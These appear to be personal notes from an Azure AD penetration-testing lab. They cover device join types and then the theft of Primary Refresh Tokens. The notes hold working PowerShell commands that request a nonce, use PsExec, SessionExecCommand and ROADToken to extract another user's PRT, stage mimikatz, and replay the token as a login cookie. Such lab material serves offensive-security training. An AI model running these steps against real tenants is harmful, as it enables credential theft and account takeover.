Device Identities
- azure ad joined
- organization owned devices, intunes (windows 10/11, server 2019)
- azure ad registered/workplace joined
- BYOD or organization owned
- w10+, macos, ubuntu, mobile devices
- hybrid azure ad joined
- joined on-prem AD
When a machine joines azure AD the following groups become part of the local administrators group: - global administrators - azure ad joined device local administrator - user who joined the machine to azure
CloudAP SSP requests and caches PRT on device. The PRT contains all the claims for the current user.
Abuse this by Extracting the PRT and using it to perform SSO
extract PRT with RoadTools
ROADToken.exe or Get-AADIntUserPRTToken (as the target user, so we might need to use SessionExecCommand):
# get a nonce (can be run from any machine)
$TenantId = "2d50cb29-5f7b-48a4-87ce-fe75a941adb6"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce# to query currently logged on users:
Invoke-Command -Session $infradminsrv -ScriptBlock{query user}
# run road token in the context of another user
Invoke-Command -Session $infradminsrv -ScriptBlock{C:\Users\Public\student64\PsExec64.exe -accepteula -s "cmd.exe" " /c C:\Users\Public\student64\SessionExecCommand.exe MichaelMBarron C:\Users\Public\student64\ROADToken.exe AwABAAEAAAACAOz_BQD0_xchDSnrlNdWF8uBhIEpXKfpyyzJsrPDBUY-iK4l2Tvb4HugQrcDz7Wb2m5mvNeU8x_e4to7NUA1O2FvE7u-5JEgAA > C:\Users\Public\student64\PRT.txt"}
Invoke-Command -Session $infradminsrv -ScriptBlock{cat C:\Users\Public\student64\PRT.txt}alternative: use mimikatz
Copy-Item -ToSession $jumpvm -Path C:\AzAD\Tools\mimikatz.exe -Destination C:\Users\student64\Documents -Verbosedo something with the PRT
Visit https://login.microsoftonline.com/login.srf , set x-ms-RefreshTokenCredential (with httpOnly too), if it does not work, redo it.